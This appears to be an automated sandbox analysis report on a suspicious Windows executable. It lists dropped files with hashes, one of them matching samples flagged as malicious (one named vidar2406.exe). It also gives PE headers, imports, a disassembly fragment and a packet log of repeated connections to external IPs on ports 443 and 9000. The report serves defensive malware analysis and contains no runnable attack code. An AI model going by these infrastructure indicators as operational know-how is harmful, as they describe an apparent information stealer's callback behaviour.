                                                  SHA-256:898C2EA1BD7606737F3E66CA0824CDBEDD616C37160FE8CAA56C3366A87B7690
                                                  SHA-512:3A387B76085BACE0426D5FD57C0F266C7BFC750074AD1AD40D81FC79D10040FDB68081C7F26F8EF8202C98235CB6C68BA66EA5556CA98AFD2657D25CE1CCE9C8
                                                  Malicious:false
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):8302
                                                  Entropy (8bit):3.693791566712483
                                                  Encrypted:false
                                                  SSDEEP:192:R6l7wVeJIc6jb6Y9USUAQZigmfNJDfprT89bTGqsfkBcm:R6lXJL6f6Y+SUBigmfNJDWyJfc
                                                  MD5:24C3B04D0F5B88A2818497D697D4236A
                                                  SHA1:8E1B4777545F2E5DB34EF6A2532E92940CF4E616
                                                  SHA-256:E4932DB9DD88F879209011805F74D9995BB485E59017EAE09CC4E442DF077B27
                                                  SHA-512:BBD62227C006BE4ADF816CDF8541780EF30CCF14689E81DDB16653AC89D3418226C867296B16CF6C5BAE29A902F224B67F0DB98999FCCD5BE683771B7B86C4D1
                                                  Malicious:false
                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.7.3.6.<./.P.i.
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):4585
                                                  Entropy (8bit):4.463322871864609
                                                  Encrypted:false
                                                  SSDEEP:48:cvIwWl8zs7Jg77aI9U3WpW8VYfyYm8M4Jy/8QNiFY+q8DWQcrTCUdkU3d:uIjfVI7qG7ViJAVwC3j3d
                                                  MD5:96F403094D9DE84191AF86990F6B9C47
                                                  SHA1:C12BC2B200C7424E251A3427FF9C22E055A5BF6B
                                                  SHA-256:CDC312DD464812B365D051FB93C1F12162AD12A03AC73F031ED99E0D58B72FF1
                                                  SHA-512:9C32FE37354BB16B9E9D90732BAEB31EC49717B47F0D51FB7EA169ED81814ADD4863669D936BC53DE0887A8B9C6C5E415725C4EB123508BE3538DEFBD2F4CDC0
                                                  Malicious:false
                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="391574" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                  Category:dropped
                                                  Size (bytes):71954
                                                  Entropy (8bit):7.996617769952133
                                                  Encrypted:true
                                                  SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                  MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                  SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                  SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                  SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                  Malicious:false
                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):290
                                                  Entropy (8bit):2.9599869033579713
                                                  Encrypted:false
                                                  SSDEEP:6:kKyT9Usw9L+N+SkQlPlEGYRMY9z+4KlDA3RUe/:KqD9LNkPlE99SNxAhUe/
                                                  MD5:C52E2193D5BA95BACD3E2BEE315815FA
                                                  SHA1:DE4CE259195497A1B06C722458BA5525A14C70A9
                                                  SHA-256:165F19F8A72938B46A88F53DF01EBBA2C892F25D2AF64583AA556EE99143DDDE
                                                  SHA-512:1955B60135D9D89354B5EC7085107C2EAC5B7E9E1661F8A597FC96CB4F4DBA8F812A8AA06A282CBACA3F125DBB2A456CA2DD4AE211A173A7A8946319A79EA76E
                                                  Malicious:false
                                                  Preview:p...... .........t......(....................................................... ........G..@.......................h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...
                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):2459136
                                                  Entropy (8bit):6.052474106868353
                                                  Encrypted:false
                                                  SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                  MD5:90E744829865D57082A7F452EDC90DE5
                                                  SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                  SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                  SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Joe Sandbox View:
                                                  • Filename: vjYcExA6ou.exe, Detection: malicious
                                                  • Filename: 2E7ZdlxkOL.exe, Detection: malicious
                                                  • Filename: S8co1ACRdn.exe, Detection: malicious
                                                  • Filename: M9dfZzH3qn.exe, Detection: malicious
                                                  • Filename: 5IRIk4f1PO.exe, Detection: malicious
                                                  • Filename: 1719520929.094843_setup.exe, Detection: malicious
                                                  • Filename: 1Cvd8TyYPm.exe, Detection: malicious
                                                  • Filename: WR0fuHnEVW.exe, Detection: malicious
                                                  • Filename: BRWgvKaqbg.exe, Detection: malicious
                                                  • Filename: vidar2406.exe, Detection: malicious
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:MS Windows registry file, NT/2000 or above
                                                  Category:dropped
                                                  Size (bytes):1835008
                                                  Entropy (8bit):4.465442754137135
                                                  Encrypted:false
                                                  SSDEEP:6144:NIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNtdwBCswSbB:eXD94+WlLZMM6YFHb+B
                                                  MD5:4ADACAA5D41677E9452880ABFB9C9627
                                                  SHA1:1181F1F71C640FA0A5C97AEB2DD877C5584BE36B
                                                  SHA-256:50354B8D3F13FA6AF14578773876927AAC0BE7C02766761BD7403326379BFBE6
                                                  SHA-512:12360760CE2302DEAFF5E019A579D5EFC78BBF6AFCE1DEF6B067006B6556BCF0A873C8A544001F6BBBFCF7AB8196BDFE8B67E09D6868C773AA5F8545DA6A1C3C
                                                  Malicious:false
                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):7.502731457989579
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:56bDgH9sMQ.exe
                                                  File size:430'592 bytes
                                                  MD5:f88272ea7674d3acedd8adcf7643c598
                                                  SHA1:0066fd44e2cd9293af414f735bd80456f4e3eb1d
                                                  SHA256:fad264acc346be1e63cd47611cd305cb9c894a13843119e22e87744808295387
                                                  SHA512:3d3435572767b85307271519a5a51668e284cc9aa0d09bf024aaff31a4b4329bb189c627ceda90ba00f02445f0d34f4de642b30b054ecf9d1ac88babeb113963
                                                  SSDEEP:12288:Zh0vCnLVT7zishmwaOF9dJl3AnhpzTly:Z8kLVPzMO9dnQnhZT
                                                  TLSH:4B94D000B8D18072D56312360AE4DBB59EBEB8710BB659DFA7D40B3F9F302D1973265A
                                                  Icon Hash:90cececece8e8eb0
                                                  Entrypoint:0x409267
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x667E8856 [Fri Jun 28 09:54:30 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:6
                                                  OS Version Minor:0
                                                  File Version Major:6
                                                  File Version Minor:0
                                                  Subsystem Version Major:6
                                                  Subsystem Version Minor:0
                                                  Import Hash:9d5b9d61589b83a7f2c3d41f757e8ae0
                                                  Instruction
                                                  call 00007F69C0AE26FAh
                                                  jmp 00007F69C0AE1F59h
                                                  push ebp
                                                  mov ebp, esp
                                                  jmp 00007F69C0AE20EFh
                                                  push dword ptr [ebp+08h]
                                                  call 00007F69C0AEEBD9h
                                                  pop ecx
                                                  test eax, eax
                                                  je 00007F69C0AE20F1h
                                                  push dword ptr [ebp+08h]
                                                  call 00007F69C0AE973Dh
                                                  pop ecx
                                                  test eax, eax
                                                  je 00007F69C0AE20C8h
                                                  pop ebp
                                                  ret
                                                  cmp dword ptr [ebp+08h], FFFFFFFFh
                                                  je 00007F69C0AE29EFh
                                                  jmp 00007F69C0ADE961h
                                                  push ebp
                                                  mov ebp, esp
                                                  push dword ptr [ebp+08h]
                                                  call 00007F69C0AE29FBh
                                                  pop ecx
                                                  pop ebp
                                                  ret
                                                  jmp 00007F69C0AE29F3h
                                                  cmp ecx, dword ptr [00467F00h]
                                                  jne 00007F69C0AE20E3h
                                                  ret
                                                  jmp 00007F69C0AE2A12h
                                                  push ebp
                                                  mov ebp, esp
                                                  test byte ptr [ebp+08h], 00000001h
                                                  push esi
                                                  mov esi, ecx
                                                  mov dword ptr [esi], 004294B8h
                                                  je 00007F69C0AE20ECh
                                                  push 0000000Ch
                                                  push esi
                                                  call 00007F69C0AE20AAh
                                                  pop ecx
                                                  pop ecx
                                                  mov eax, esi
                                                  pop esi
                                                  pop ebp
                                                  retn 0004h
                                                  push ebp
                                                  mov ebp, esp
                                                  mov eax, dword ptr [ebp+08h]
                                                  push esi
                                                  mov ecx, dword ptr [eax+3Ch]
                                                  add ecx, eax
                                                  movzx eax, word ptr [ecx+14h]
                                                  lea edx, dword ptr [ecx+18h]
                                                  add edx, eax
                                                  movzx eax, word ptr [ecx+06h]
                                                  imul esi, eax, 28h
                                                  add esi, edx
                                                  cmp edx, esi
                                                  je 00007F69C0AE20FBh
                                                  mov ecx, dword ptr [ebp+0Ch]
                                                  cmp ecx, dword ptr [edx+0Ch]
                                                  jc 00007F69C0AE20ECh
                                                  mov eax, dword ptr [edx+08h]
                                                  add eax, dword ptr [edx+0Ch]
                                                  cmp ecx, eax
                                                  jc 00007F69C0AE20EEh
                                                  add edx, 28h
                                                  cmp edx, esi
                                                  jne 00007F69C0AE20CCh
                                                  xor eax, eax
                                                  pop esi
                                                  pop ebp
                                                  ret
                                                  mov eax, edx
                                                  jmp 00007F69C0AE20DBh
                                                  push esi
                                                  call 00007F69C0AE2B7Ah
                                                  Name                                  Virtual Address  Virtual Size  Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT          0x329f0          0x50          .rdata
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT          0x32a40          0x50          .rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC       0x6b000          0x1f34        .reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG           0x30958          0x1c          .rdata
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x30898          0x40          .rdata
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT             0x28000          0x164         .rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                                  Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy            Characteristics
                                                  .text   0x1000           0x25837       0x25a00   fc9bd41652ae1c3a0e37ca698dd95bf0  False     0.5627919954318937  data       6.645977488914615  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .BsS    0x27000          0xe4d         0x1000    c60cb75b55b0360ef647856eead62e0f  False     0.586669921875      data       6.069768915980845  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata  0x28000          0xb266        0xb400    5e6632026bcbb24e9d88e9402b6ada63  False     0.4210069444444444  data       5.045364945421655  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data   0x34000          0x360f4       0x35000   b0d5fde2711702bed068653954b5d3cd  False     0.982689047759434   data       7.984268247554252  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .reloc  0x6b000          0x1f34        0x2000    842a65f9b0a414aeb786ee4c45f53f77  False     0.7607421875        data       6.516771118658397  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                  DLL           Import
                                                  GDI32.dll     Polyline
                                                  USER32.dll    OffsetRect
                                                  KERNEL32.dll  CreateFileW, HeapSize, GetProcessHeap, SetStdHandle, WaitForSingleObject, CreateThread, VirtualAlloc, CloseHandle, WaitForSingleObjectEx, GetCurrentThreadId, GetExitCodeThread, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, QueryPerformanceCounter, ReleaseSRWLockExclusive, WakeAllConditionVariable, EncodePointer, DecodePointer, LCMapStringEx, GetSystemTimeAsFileTime, GetModuleHandleW, GetProcAddress, GetCPInfo, IsProcessorFeaturePresent, GetCurrentProcessId, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, TerminateProcess, SetEnvironmentVariableW, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, GetFileType, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW
                                                  Name               Ordinal  Address
                                                  IUAhsiuchniuohAIU  1        0x427d10
                                                  Timestamp                            Source Port  Dest Port  Source IP       Dest IP
                                                  Jul 1, 2024 09:12:29.286595106 CEST  49729        443        192.168.2.4     149.154.167.99
                                                  Jul 1, 2024 09:12:29.286647081 CEST  443          49729      149.154.167.99  192.168.2.4
                                                  Jul 1, 2024 09:12:29.286734104 CEST  49729        443        192.168.2.4     149.154.167.99
                                                  Jul 1, 2024 09:12:29.292526960 CEST  49729        443        192.168.2.4     149.154.167.99
                                                  Jul 1, 2024 09:12:29.292536974 CEST  443          49729      149.154.167.99  192.168.2.4
                                                  Jul 1, 2024 09:12:30.000675917 CEST  443          49729      149.154.167.99  192.168.2.4
                                                  Jul 1, 2024 09:12:30.000760078 CEST  49729        443        192.168.2.4     149.154.167.99
                                                  Jul 1, 2024 09:12:30.052889109 CEST  49729        443        192.168.2.4     149.154.167.99
                                                  Jul 1, 2024 09:12:30.052903891 CEST  443          49729      149.154.167.99  192.168.2.4
                                                  Jul 1, 2024 09:12:30.053193092 CEST  443          49729      149.154.167.99  192.168.2.4
                                                  Jul 1, 2024 09:12:30.053236961 CEST  49729        443        192.168.2.4     149.154.167.99
                                                  Jul 1, 2024 09:12:30.056638956 CEST  49729        443        192.168.2.4     149.154.167.99
                                                  Jul 1, 2024 09:12:30.104506016 CEST  443          49729      149.154.167.99  192.168.2.4
                                                  Jul 1, 2024 09:12:30.263664961 CEST  443          49729      149.154.167.99  192.168.2.4
                                                  Jul 1, 2024 09:12:30.263688087 CEST  443          49729      149.154.167.99  192.168.2.4
                                                  Jul 1, 2024 09:12:30.263719082 CEST  443          49729      149.154.167.99  192.168.2.4
                                                  Jul 1, 2024 09:12:30.263724089 CEST  49729        443        192.168.2.4     149.154.167.99
                                                  Jul 1, 2024 09:12:30.263735056 CEST  443          49729      149.154.167.99  192.168.2.4
                                                  Jul 1, 2024 09:12:30.263745070 CEST  49729        443        192.168.2.4     149.154.167.99
                                                  Jul 1, 2024 09:12:30.263783932 CEST49729443192.168.2.4149.154.167.99
                                                  Jul 1, 2024 09:12:30.263787985 CEST44349729149.154.167.99192.168.2.4
                                                  Jul 1, 2024 09:12:30.263854980 CEST49729443192.168.2.4149.154.167.99
                                                  Jul 1, 2024 09:12:30.265527010 CEST49729443192.168.2.4149.154.167.99
                                                  Jul 1, 2024 09:12:30.265538931 CEST44349729149.154.167.99192.168.2.4
                                                  Jul 1, 2024 09:12:30.270354033 CEST497329000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:30.278695107 CEST900049732195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:30.278858900 CEST497329000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:30.279103994 CEST497329000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:30.285150051 CEST900049732195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:30.970880032 CEST900049732195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:30.970913887 CEST900049732195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:30.970958948 CEST497329000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:30.970958948 CEST497329000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:31.905546904 CEST497329000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:31.910325050 CEST900049732195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:32.104872942 CEST900049732195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:32.104938030 CEST497329000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:32.105325937 CEST497329000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:32.110122919 CEST900049732195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:32.574662924 CEST900049732195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:32.574726105 CEST497329000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:32.586232901 CEST497369000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:32.591006994 CEST900049736195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:32.591078997 CEST497369000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:32.591382027 CEST497369000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:32.596151114 CEST900049736195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:33.251754045 CEST900049736195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:33.251820087 CEST497369000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:33.252275944 CEST497369000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:33.254141092 CEST497369000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:33.256989002 CEST900049736195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:33.258899927 CEST900049736195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:34.038615942 CEST900049736195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:34.038810015 CEST497369000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:34.040028095 CEST497329000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:34.040452003 CEST497379000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:34.047564983 CEST900049737195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:34.047714949 CEST497379000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:34.047739029 CEST900049732195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:34.047884941 CEST497329000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:34.047966003 CEST497379000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:34.053153992 CEST900049737195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:34.700073004 CEST900049737195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:34.702581882 CEST497379000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:34.702912092 CEST497379000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:34.704474926 CEST497379000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:34.707715034 CEST900049737195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:34.709364891 CEST900049737195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:35.373859882 CEST900049737195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:35.373907089 CEST900049737195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:35.373924017 CEST497379000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:35.373990059 CEST497379000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:35.375190020 CEST497369000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:35.375588894 CEST497389000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:35.380338907 CEST900049738195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:35.380407095 CEST900049736195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:35.380479097 CEST497369000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:35.380496025 CEST497389000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:35.380671024 CEST497389000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:35.385515928 CEST900049738195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:36.047858000 CEST900049738195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:36.047954082 CEST497389000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:36.048228025 CEST497389000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:36.049937963 CEST497389000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:36.052989006 CEST900049738195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:36.054806948 CEST900049738195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:36.707998991 CEST900049738195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:36.708029985 CEST900049738195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:36.708041906 CEST900049738195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:36.708051920 CEST900049738195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:36.708065033 CEST900049738195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:36.708076000 CEST900049738195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:36.708079100 CEST497389000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:36.708116055 CEST497389000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:36.709412098 CEST497379000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:36.709723949 CEST497409000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:36.714447021 CEST900049737195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:36.714492083 CEST900049740195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:36.714492083 CEST497379000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:36.714557886 CEST497409000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:36.714808941 CEST497409000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:36.719578981 CEST900049740195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:37.366106033 CEST900049740195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:37.366167068 CEST497409000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:37.366633892 CEST497409000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:37.368395090 CEST497409000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:37.371438026 CEST900049740195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:37.373168945 CEST900049740195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:38.025022030 CEST900049740195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:38.025135994 CEST497409000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:38.100581884 CEST497389000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:38.101118088 CEST497419000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:38.106188059 CEST900049738195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:38.106336117 CEST497389000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:38.106642962 CEST900049741195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:38.106713057 CEST497419000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:38.106977940 CEST497419000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:38.113101959 CEST900049741195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:38.780217886 CEST900049741195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:38.780283928 CEST497419000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:38.780641079 CEST497419000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:38.782170057 CEST497419000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:38.782250881 CEST497419000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:38.785449028 CEST900049741195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:38.788652897 CEST900049741195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:38.788662910 CEST900049741195.201.251.214192.168.2.4
